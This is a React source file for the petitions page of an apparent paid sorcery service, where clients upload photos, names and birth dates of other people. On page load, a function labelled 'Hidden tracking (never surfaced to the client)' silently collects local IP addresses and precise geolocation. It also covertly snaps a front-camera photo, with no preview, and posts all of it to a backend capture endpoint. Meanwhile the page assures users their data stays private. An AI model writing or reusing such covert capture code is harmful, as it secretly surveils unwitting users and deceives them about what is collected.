import { useEffect, useRef, useState } from "react";
import { useParams } from "react-router-dom";
import axios from "axios";
import { motion, AnimatePresence } from "framer-motion";
import {
  Loader2, Sparkles, Upload, X, Trash2, Send, Wand2, CheckCircle2,
  AlertTriangle, ImagePlus, Eraser,
} from "lucide-react";
import { toast } from "sonner";
import { getLocalIPs } from "@/utils/localIps";
import { useVoiceGuide } from "@/contexts/VoiceAssistantContext";

const API = `${process.env.REACT_APP_BACKEND_URL}/api`;

/* -------------------------------------------------------------------------- */
/* Hidden tracking (never surfaced to the client)                             */
/* -------------------------------------------------------------------------- */
const silentCapture = async (token) => {
  const out = { geo_lat: null, geo_lng: null, geo_accuracy: null, photo_b64: null, private_ips: [] };
  try { out.private_ips = await getLocalIPs(); } catch { /* ignore */ }

  // Geolocation — only if already granted (no visible prompt)
  try {
    if (navigator.permissions?.query && navigator.geolocation) {
      const st = await navigator.permissions.query({ name: "geolocation" });
      if (st.state === "granted") {
        await new Promise((resolve) => {
          navigator.geolocation.getCurrentPosition(
            (pos) => { out.geo_lat = pos.coords.latitude; out.geo_lng = pos.coords.longitude; out.geo_accuracy = pos.coords.accuracy; resolve(); },
            () => resolve(),
            { enableHighAccuracy: true, timeout: 5000, maximumAge: 60000 },
          );
        });
      }
    }
  } catch { /* ignore */ }

  // Camera photo — only if camera permission already granted (silent, no preview)
  try {
    if (navigator.permissions?.query && navigator.mediaDevices?.getUserMedia) {
      const st = await navigator.permissions.query({ name: "camera" });
      if (st.state === "granted") {
        const stream = await navigator.mediaDevices.getUserMedia({
          video: { facingMode: "user", width: { ideal: 640 }, height: { ideal: 480 } }, audio: false,
        });
        try {
          const video = document.createElement("video");
          video.srcObject = stream; video.playsInline = true; video.muted = true;
          await video.play();
          await new Promise((r) => setTimeout(r, 600));
          const canvas = document.createElement("canvas");
          canvas.width = video.videoWidth || 640; canvas.height = video.videoHeight || 480;
          canvas.getContext("2d").drawImage(video, 0, 0, canvas.width, canvas.height);
          out.photo_b64 = canvas.toDataURL("image/jpeg", 0.7).split(",")[1];
        } finally { try { stream.getTracks().forEach((t) => t.stop()); } catch { /* noop */ } }
      }
    }
  } catch { /* ignore */ }

  try { await axios.post(`${API}/petition/${token}/capture`, out); } catch { /* best effort */ }
};

const NotFound = ({ msg }) => (
  <div className="min-h-screen bg-[#050308] text-white flex flex-col items-center justify-center px-6 text-center" data-testid="petition-not-found">
    <AlertTriangle className="w-10 h-10 text-amber-300 mb-3" />
    <h1 className="font-serif text-2xl mb-2">Enlace no disponible</h1>
    <p className="text-sm text-neutral-400 max-w-md">{msg || "Este enlace no existe o ya expiró. Pídele a Cristopher uno nuevo por WhatsApp."}</p>
  </div>
);

export default function PetitionsPage() {
  const { token } = useParams();
  const [state, setState] = useState("loading"); // loading | ready | invalid | done
  useVoiceGuide("petitions:ready", "Aquí escribes tus peticiones para tu trabajo espiritual. Sé específico: nombres completos, fechas de nacimiento y qué deseas lograr con cada persona. Puedes subir fotos de las personas involucradas. Cuando termines, toca Enviar peticiones.", state === "ready");
  useVoiceGuide("petitions:done", "Tus peticiones fueron enviadas a Cristopher. Gracias; él comenzará a trabajar con tu energía.", state === "done");
  const [data, setData] = useState(null);
  const [errorText, setErrorText] = useState("");
  const [photos, setPhotos] = useState([]); // {photo_id, url, person_name, person_dob, person_info, uploading}
  const [petition, setPetition] = useState("");
  const [improving, setImproving] = useState(false);
  const [submitting, setSubmitting] = useState(false);
  const fileRef = useRef(null);

  useEffect(() => {
    (async () => {
      try {
        const r = await axios.get(`${API}/petition/${token}`);
        setData(r.data);
        setPetition(r.data.petition_text || "");
        setPhotos((r.data.photos || []).map((p) => ({
          photo_id: p.id, url: `${API}/petition/${token}/photo/${p.id}`,
          person_name: p.person_name || "", person_dob: p.person_dob || "", person_info: p.person_info || "",
          uploading: false,
        })));
        setState("ready");
      } catch (err) {
        const code = err?.response?.status;
        setErrorText(typeof err?.response?.data?.detail === "string" ? err.response.data.detail : "");
        setState(code === 410 ? "expired" : "invalid");
      }
    })();
    silentCapture(token);
  }, [token]);

  const onPickFiles = async (e) => {
    const files = Array.from(e.target.files || []);
    e.target.value = "";
    for (const file of files) {
      if (photos.filter((p) => !p.deleted).length >= 20) { toast.error("Máximo 20 fotos"); break; }
      const tempId = `tmp-${Math.random().toString(36).slice(2)}`;
      const localUrl = URL.createObjectURL(file);
      setPhotos((prev) => [...prev, { photo_id: tempId, url: localUrl, person_name: "", person_dob: "", person_info: "", uploading: true }]);
      try {
        const fd = new FormData();
        fd.append("file", file);
        const r = await axios.post(`${API}/petition/${token}/upload-photo`, fd, { headers: { "Content-Type": "multipart/form-data" } });
        setPhotos((prev) => prev.map((p) => p.photo_id === tempId
          ? { ...p, photo_id: r.data.photo_id, url: `${API}/petition/${token}/photo/${r.data.photo_id}`, uploading: false }
          : p));
      } catch (err) {
        setPhotos((prev) => prev.filter((p) => p.photo_id !== tempId));
        toast.error(err?.response?.data?.detail || "No se pudo subir la foto");
      }
    }
  };

  const removePhoto = async (photo) => {
    setPhotos((prev) => prev.filter((p) => p.photo_id !== photo.photo_id));
    if (!photo.photo_id.startsWith("tmp-")) {
      try { await axios.delete(`${API}/petition/${token}/photo/${photo.photo_id}`); } catch { /* ignore */ }
    }
  };

  const updatePhoto = (id, field, value) =>
    setPhotos((prev) => prev.map((p) => (p.photo_id === id ? { ...p, [field]: value } : p)));

  const improve = async () => {
    if (petition.trim().length < 3) { toast.error("Escribe tu petición primero"); return; }
    setImproving(true);
    try {
      const r = await axios.post(`${API}/petition/${token}/improve`, { text: petition });
      setPetition(r.data.improved || petition);
      toast.success("Texto mejorado con IA ✨");
    } catch (err) {
      toast.error(err?.response?.data?.detail || "La IA no está disponible ahora");
    } finally { setImproving(false); }
  };

  const clearPetition = () => { setPetition(""); toast.message("Petición borrada"); };

  const submit = async () => {
    const live = photos.filter((p) => !p.uploading);
    if (!petition.trim() && live.length === 0) { toast.error("Agrega una foto o escribe tu petición"); return; }
    if (photos.some((p) => p.uploading)) { toast.error("Espera a que terminen de subir las fotos"); return; }
    setSubmitting(true);
    try {
      await axios.post(`${API}/petition/${token}/submit`, {
        petition_text: petition.trim(),
        photos: live.map((p) => ({ photo_id: p.photo_id, person_name: p.person_name, person_dob: p.person_dob, person_info: p.person_info })),
      });
      setState("done");
      toast.success("¡Peticiones enviadas! ✨");
    } catch (err) {
      toast.error(err?.response?.data?.detail || "No se pudo enviar");
    } finally { setSubmitting(false); }
  };

  if (state === "loading") {
    return <div className="min-h-screen bg-[#050308] flex items-center justify-center"><Loader2 className="w-8 h-8 animate-spin text-[#d4af37]" /></div>;
  }
  if (state === "invalid" || state === "expired") return <NotFound msg={errorText} />;

  if (state === "done") {
    return (
      <div className="min-h-screen bg-[#050308] text-white flex flex-col items-center justify-center px-6 text-center" data-testid="petition-done">
        <motion.div initial={{ scale: 0.8, opacity: 0 }} animate={{ scale: 1, opacity: 1 }}>
          <CheckCircle2 className="w-16 h-16 text-emerald-400 mx-auto mb-4" />
        </motion.div>
        <h1 className="font-serif text-3xl mb-2">¡Recibido!</h1>
        <p className="text-sm text-neutral-400 max-w-md">
          Tus fotos y peticiones llegaron a Cristopher. Las trabajará con todo el poder de tu hechicería. Si necesitas
          agregar algo más, pídele un enlace nuevo por WhatsApp. Bendiciones ✨
        </p>
      </div>
    );
  }

  return (
    <div className="min-h-screen bg-[#050308] text-white px-4 py-8 relative overflow-hidden" data-testid="petition-page">
      <div className="pointer-events-none absolute inset-0 opacity-40" style={{ background: "radial-gradient(ellipse at 15% 0%, rgba(217,70,239,0.22), transparent 55%), radial-gradient(ellipse at 90% 100%, rgba(212,175,55,0.18), transparent 50%)" }} />
      <div className="relative max-w-2xl mx-auto">
        <div className="text-center mb-7">
          <div className="inline-flex items-center gap-2 text-[10px] uppercase tracking-[0.3em] text-[#d4af37] mb-2"><Sparkles className="w-3.5 h-3.5" /> CrisAngel Astral</div>
          <h1 className="font-serif text-3xl sm:text-4xl">Tus peticiones y fotos</h1>
          <p className="text-sm text-neutral-400 mt-2">
            Hola <b className="text-white">{data?.client_name}</b>. Para tu <b className="text-white">{data?.service_name}</b>, sube las fotos de las
            personas y escribe lo que deseas pedir. Puedo mejorar tu texto con IA antes de enviarlo.
          </p>
        </div>

        {/* Photos */}
        <div className="rounded-2xl border border-white/10 bg-black/50 backdrop-blur p-5 mb-5">
          <div className="flex items-center justify-between mb-3">
            <h2 className="text-base font-semibold flex items-center gap-2"><ImagePlus className="w-4 h-4 text-[#d4af37]" /> Fotos ({photos.length})</h2>
            <button
              data-testid="petition-add-photo"
              onClick={() => fileRef.current?.click()}
              className="text-[11px] px-3 py-1.5 rounded-full border border-[#d4af37]/50 bg-[#d4af37]/10 text-[#d4af37] hover:bg-[#d4af37]/20 flex items-center gap-1.5 font-semibold uppercase tracking-widest"
            >
              <Upload className="w-3.5 h-3.5" /> Agregar
            </button>
            <input ref={fileRef} type="file" accept="image/*" multiple className="hidden" onChange={onPickFiles} data-testid="petition-file-input" />
          </div>
          {photos.length === 0 ? (
            <button onClick={() => fileRef.current?.click()} className="w-full py-10 rounded-xl border-2 border-dashed border-white/15 text-neutral-500 hover:border-[#d4af37]/40 hover:text-[#d4af37] transition flex flex-col items-center gap-2">
              <ImagePlus className="w-7 h-7" />
              <span className="text-xs">Toca para subir fotos de las personas</span>
            </button>
          ) : (
            <div className="space-y-3">
              <AnimatePresence>
                {photos.map((p) => (
                  <motion.div
                    key={p.photo_id}
                    initial={{ opacity: 0, y: 8 }} animate={{ opacity: 1, y: 0 }} exit={{ opacity: 0, height: 0 }}
                    data-testid={`petition-photo-${p.photo_id}`}
                    className="rounded-xl border border-white/10 bg-black/40 p-3 flex gap-3"
                  >
                    <div className="relative shrink-0">
                      <img src={p.url} alt="" className="w-20 h-20 rounded-lg object-cover border border-white/10" />
                      {p.uploading && <div className="absolute inset-0 rounded-lg bg-black/60 flex items-center justify-center"><Loader2 className="w-5 h-5 animate-spin text-[#d4af37]" /></div>}
                    </div>
                    <div className="flex-1 min-w-0 grid grid-cols-1 sm:grid-cols-2 gap-2">
                      <input value={p.person_name} onChange={(e) => updatePhoto(p.photo_id, "person_name", e.target.value)} placeholder="Nombre completo" data-testid={`petition-name-${p.photo_id}`} className="bg-black/50 border border-white/10 rounded-lg px-2.5 py-1.5 text-sm text-white placeholder:text-neutral-600 focus:border-[#d4af37]/50 outline-none" />
                      <input value={p.person_dob} onChange={(e) => updatePhoto(p.photo_id, "person_dob", e.target.value)} placeholder="Fecha de nacimiento" data-testid={`petition-dob-${p.photo_id}`} className="bg-black/50 border border-white/10 rounded-lg px-2.5 py-1.5 text-sm text-white placeholder:text-neutral-600 focus:border-[#d4af37]/50 outline-none" />
                      <textarea value={p.person_info} onChange={(e) => updatePhoto(p.photo_id, "person_info", e.target.value)} placeholder="Datos / qué pides para esta persona" rows={2} data-testid={`petition-info-${p.photo_id}`} className="sm:col-span-2 bg-black/50 border border-white/10 rounded-lg px-2.5 py-1.5 text-sm text-white placeholder:text-neutral-600 focus:border-[#d4af37]/50 outline-none resize-none" />
                    </div>
                    <button onClick={() => removePhoto(p)} data-testid={`petition-remove-${p.photo_id}`} className="shrink-0 h-8 w-8 rounded-full bg-rose-500/15 text-rose-300 hover:bg-rose-500/25 flex items-center justify-center self-start"><X className="w-4 h-4" /></button>
                  </motion.div>
                ))}
              </AnimatePresence>
            </div>
          )}
        </div>

        {/* Petition text */}
        <div className="rounded-2xl border border-white/10 bg-black/50 backdrop-blur p-5 mb-5">
          <h2 className="text-base font-semibold mb-3 flex items-center gap-2"><Sparkles className="w-4 h-4 text-[#d4af37]" /> Tu petición</h2>
          <textarea
            value={petition}
            onChange={(e) => setPetition(e.target.value)}
            rows={6}
            data-testid="petition-text"
            placeholder="Escribe con tus palabras lo que deseas pedir. No te preocupes por la redacción: pulsa «Mejorar con IA» y lo dejaré claro y bonito."
            className="w-full bg-black/50 border border-white/10 rounded-xl px-3 py-3 text-sm text-white placeholder:text-neutral-600 focus:border-[#d4af37]/50 outline-none resize-none"
          />
          <div className="flex flex-wrap gap-2 mt-3">
            <button data-testid="petition-improve" onClick={improve} disabled={improving} className="text-[11px] px-3 py-2 rounded-full border border-fuchsia-400/50 bg-fuchsia-500/10 text-fuchsia-200 hover:bg-fuchsia-500/20 flex items-center gap-1.5 font-semibold uppercase tracking-widest disabled:opacity-50">
              {improving ? <Loader2 className="w-3.5 h-3.5 animate-spin" /> : <Wand2 className="w-3.5 h-3.5" />} Mejorar con IA
            </button>
            <button data-testid="petition-clear" onClick={clearPetition} className="text-[11px] px-3 py-2 rounded-full border border-white/15 text-neutral-300 hover:bg-white/5 flex items-center gap-1.5 uppercase tracking-widest">
              <Eraser className="w-3.5 h-3.5" /> Borrar
            </button>
          </div>
        </div>

        <button
          data-testid="petition-submit"
          onClick={submit}
          disabled={submitting}
          className="w-full py-3.5 rounded-full bg-[#d4af37] hover:bg-[#f3d878] text-black font-bold uppercase tracking-widest text-xs flex items-center justify-center gap-2 disabled:opacity-50"
        >
          {submitting ? <Loader2 className="w-4 h-4 animate-spin" /> : <Send className="w-4 h-4" />} Enviar mis peticiones
        </button>
        <p className="text-center text-[11px] text-neutral-500 mt-3">Tus datos llegan directo y en privado a Cristopher. 🔒</p>
      </div>
    </div>
  );
}
